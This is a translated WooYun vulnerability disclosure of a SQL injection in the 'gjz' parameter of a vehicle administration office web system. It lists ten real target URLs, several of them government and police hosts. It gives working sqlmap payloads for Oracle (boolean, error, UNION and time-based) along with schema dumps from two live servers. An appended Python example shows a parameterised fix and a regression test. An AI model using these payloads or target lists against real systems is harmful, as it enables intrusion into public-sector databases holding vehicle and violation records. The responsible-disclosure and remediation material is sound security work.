Vulnerability summary (followers: 24)

Defect ID: wooyun-2014-088436

Title: Generic SQL injection in the vehicle administration office (车管所) system #1 (affects a large number of vehicle administration office websites)

Vendor: Shandong Guoan Information Industry Co., Ltd. (山东国安信息产业有限责任公司)

Author: 路人甲

Submitted: 2014-12-26 11:37

Fix time: 2015-03-26 11:38

Public disclosure: 2015-03-26 11:38

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-12-26: Details sent to the vendor, awaiting vendor handling
2014-12-30: Vendor confirmed; details disclosed to the vendor only
2015-01-02: Details opened to third-party security partners
2015-02-23: Details disclosed to core white hats and domain experts
2015-03-05: Details disclosed to regular white hats
2015-03-15: Details disclosed to intern white hats
2015-03-26: Details disclosed to the public

Brief description:

As stated in the title.

Detailed description:

The affected cases are as follows:
http://www.lcwscgs.com/wscgs/liuyan.do
http://60.211.179.22:9080/wscgs/liuyan.do
http://58.59.39.43:9080/wscgs/liuyan.do
http://cgs.qdpolice.gov.cn:9080/wscgs/liuyan.do
http://218.59.228.162/wscgs/liuyan.do
http://cgs.ytjj.gov.cn:9061/wscgs/liuyan.do
http://www.wfcgs.com:9080/wscgs/liuyan.do
http://www.bzwscgs.com:9080/wscgs/liuyan.do
http://60.213.185.51:9080/wscgs/liuyan.do
http://cgs.ijiaotong.com:9080/wscgs/liuyan.do
POST parameters: gjz=11&fy=14&lb=0&type=lylb&state=mhcx&index=260
The gjz parameter is injectable.
1. Test injection point: http://60.211.179.22:9080/wscgs/liuyan.do
POST parameters: gjz=11&fy=14&lb=0&type=lylb&state=mhcx&index=260

[Screenshot: 1.png]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: gjz
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gjz=11%' AND 8787=8787 AND '%'='&fy=1&lb=0&type=lylb&state=mhcx
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: gjz=11%' AND 9400=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(101)||CHR(111)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9400=9400) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(119)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='&fy=1&lb=0&type=lylb&state=mhcx
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: gjz=-5183%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(101)||CHR(111)||CHR(98)||CHR(113)||CHR(88)||CHR(100)||CHR(79)||CHR(101)||CHR(121)||CHR(99)||CHR(109)||CHR(79)||CHR(78)||CHR(111)||CHR(113)||CHR(105)||CHR(119)||CHR(112)||CHR(113),NULL,NULL,NULL FROM DUAL-- &fy=1&lb=0&type=lylb&state=mhcx
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: gjz=11%' AND 9663=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(85)||CHR(120)||CHR(69),5) AND '%'='&fy=1&lb=0&type=lylb&state=mhcx
---
[14:33:17] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[14:33:17] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:33:17] [INFO] fetching database (schema) names
[14:33:18] [WARNING] reflective value(s) found and filtering out
[14:33:18] [INFO] the SQL query used returns 29 entries
[14:33:19] [INFO] retrieved: CTXSYS
[14:33:20] [INFO] retrieved: DBSNMP
[14:33:20] [INFO] retrieved: DMSYS
[14:33:21] [INFO] retrieved: DRV_ADMIN
[14:33:22] [INFO] retrieved: DRV_HEALTH
[14:33:22] [INFO] retrieved: EXFSYS
[14:33:23] [INFO] retrieved: HR
[14:33:24] [INFO] retrieved: IX
[14:33:25] [INFO] retrieved: JSRH_USER
[14:33:25] [INFO] retrieved: MDSYS
[14:33:26] [INFO] retrieved: OE
[14:33:27] [INFO] retrieved: OLAPSYS
[14:33:27] [INFO] retrieved: ORDSYS
[14:33:28] [INFO] retrieved: OUTLN
[14:33:29] [INFO] retrieved: PM
[14:33:29] [INFO] retrieved: QSWEBCGS_USER
[14:33:30] [INFO] retrieved: SCOTT
[14:33:30] [INFO] retrieved: SH
[14:33:31] [INFO] retrieved: SYS
[14:33:32] [INFO] retrieved: SYSMAN
[14:33:32] [INFO] retrieved: SYSTEM
[14:33:33] [INFO] retrieved: VEH_ADMIN
[14:33:34] [INFO] retrieved: VIO_ADMIN
[14:33:34] [INFO] retrieved: WKSYS
[14:33:35] [INFO] retrieved: WK_TEST
[14:33:36] [INFO] retrieved: WMSYS
[14:33:36] [INFO] retrieved: WMS_USER
[14:33:37] [INFO] retrieved: WSCGS
[14:33:38] [INFO] retrieved: XDB
available databases [29]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] EXFSYS
[*] HR
[*] IX
[*] JSRH_USER
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QSWEBCGS_USER
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] VEH_ADMIN
[*] VIO_ADMIN
[*] WK_TEST
[*] WKSYS
[*] WMS_USER
[*] WMSYS
[*] WSCGS
[*] XDB
[14:33:38] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\60.211.179.22'


2. Test injection point: http://www.lcwscgs.com/wscgs/liuyan.do
POST parameters: gjz=11&fy=14&lb=0&type=lylb&state=mhcx&index=260

[Screenshot: 2.png]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: gjz
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gjz=11%' AND 6826=6826 AND '%'='&fy=14&lb=0&type=lylb&state=mhcx&index=260
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: gjz=11%' AND 3087=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(115)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3087=3087) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(117)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='&fy=14&lb=0&type=lylb&state=mhcx&index=260
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: gjz=11%' AND 8292=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(99)||CHR(121)||CHR(120),5) AND '%'='&fy=14&lb=0&type=lylb&state=mhcx&index=260
---
[14:35:30] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:35:30] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:35:30] [INFO] fetching database (schema) names
[14:35:32] [INFO] heuristics detected web page charset 'GB2312'
[14:35:32] [WARNING] reflective value(s) found and filtering out
[14:35:32] [INFO] the SQL query used returns 35 entries
[14:35:32] [INFO] retrieved: CTXSYS
[14:35:33] [INFO] retrieved: DRV_ADMIN
[14:35:33] [INFO] retrieved: DRV_HEALTH
[14:35:34] [INFO] retrieved: HR
[14:35:34] [INFO] retrieved: LCZW
[14:35:34] [INFO] retrieved: MDSYS
[14:35:35] [INFO] retrieved: NLV_ADMIN
[14:35:35] [INFO] retrieved: ODM
[14:35:35] [INFO] retrieved: ODM_MTR
[14:35:36] [INFO] retrieved: OE
[14:35:36] [INFO] retrieved: OLAPSYS
[14:35:36] [INFO] retrieved: ORDSYS
[14:35:37] [INFO] retrieved: OUTLN
[14:35:37] [INFO] retrieved: PM
[14:35:37] [INFO] retrieved: QS
[14:35:38] [INFO] retrieved: QSWEBCGS_USER
[14:35:38] [INFO] retrieved: QS_CBADM
[14:35:38] [INFO] retrieved: QS_CS
[14:35:39] [INFO] retrieved: QS_ES
[14:35:39] [INFO] retrieved: QS_OS
[14:35:40] [INFO] retrieved: QS_WS
[14:35:40] [INFO] retrieved: RMAN
[14:35:40] [INFO] retrieved: SCOTT
[14:35:41] [INFO] retrieved: SH
[14:35:41] [INFO] retrieved: SYS
[14:35:41] [INFO] retrieved: SYSTEM
[14:35:42] [INFO] retrieved: TMRI_VIO
[14:35:42] [INFO] retrieved: VEH_ADMIN
[14:35:42] [INFO] retrieved: VIO_ADMIN
[14:35:43] [INFO] retrieved: WKSYS
[14:35:43] [INFO] retrieved: WMSYS
[14:35:43] [INFO] retrieved: WMS_USER
[14:35:43] [INFO] retrieved: WSCGS
[14:35:44] [INFO] retrieved: XDB
[14:35:44] [INFO] retrieved: ZWELL
available databases [35]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] LCZW
[*] MDSYS
[*] NLV_ADMIN
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] QSWEBCGS_USER
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TMRI_VIO
[*] VEH_ADMIN
[*] VIO_ADMIN
[*] WKSYS
[*] WMS_USER
[*] WMSYS
[*] WSCGS
[*] XDB
[*] ZWELL
[14:35:44] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\www.lcwscgs.com'


All of the above cases can be reproduced.

Proof of vulnerability:

(Identical to the sqlmap test output given in the detailed description above.)


Fix recommendation:

Filter the parameter input.
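The `11%' AND ... AND '%'='` shape of the sqlmap payloads above shows the gjz keyword being spliced into a LIKE clause, and the recommended fix is to stop trusting that parameter. The Python example below is added here and is not code from the report or from the vendor's product: it places the concatenation pattern beside a bind-variable version with LIKE wildcards escaped, and adds a regression check built on the same true/false differential that sqlmap's boolean-based test relies on. The table name, column name and sample rows are constructed stand-ins, and SQLite stands in for the Oracle back end so the example runs offline.

```python
import sqlite3

# Constructed sample rows standing in for the message-board table behind liuyan.do;
# the table and column names are assumptions, not the vendor's schema.
SAMPLE_TITLES = ["Vehicle registration question", "Lost plate 11 report", "Fee inquiry"]

# True-condition probe taken from the report's sqlmap output, and a constructed
# false-condition twin (8788 instead of 8787) of the same shape.
TRUE_PROBE = "11%' AND 8787=8787 AND '%'='"
FALSE_PROBE = "11%' AND 8787=8788 AND '%'='"


def _connect():
    conn = sqlite3.connect(":memory:")  # SQLite stands in for Oracle so this runs offline
    conn.execute("CREATE TABLE liuyan (title TEXT)")
    conn.executemany("INSERT INTO liuyan VALUES (?)", [(t,) for t in SAMPLE_TITLES])
    return conn


def search_vulnerable(gjz):
    """Keyword search built by string concatenation: the defect class in the report."""
    sql = "SELECT title FROM liuyan WHERE title LIKE '%" + gjz + "%'"
    return [row[0] for row in _connect().execute(sql)]


def _escape_like(value, esc="\\"):
    """Escape LIKE wildcards so the keyword is matched literally, not as a pattern."""
    return value.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def search_safe(gjz):
    """Same search with the keyword passed as a bind variable, never spliced into SQL."""
    pattern = "%" + _escape_like(gjz) + "%"
    sql = "SELECT title FROM liuyan WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in _connect().execute(sql, (pattern,))]


def reacts_to_injection(search_fn):
    """Regression check: a boolean-blind-injectable search answers the true and
    false probes differently; a safe one treats both as ordinary keywords."""
    return search_fn(TRUE_PROBE) != search_fn(FALSE_PROBE)


if __name__ == "__main__":
    for fn in (search_vulnerable, search_safe):
        print(fn.__name__, "reacts to injection:", reacts_to_injection(fn))
```

`reacts_to_injection` is the kind of check that belongs in a test suite for every search endpoint that takes a free-text keyword; it fails on the concatenated version and passes on the bound one.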

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 16

Confirmed: 2014-12-30 14:06

Vendor reply:

CNVD has confirmed and reproduced the described vulnerability; it has been forwarded via CNCERT to the Shandong branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet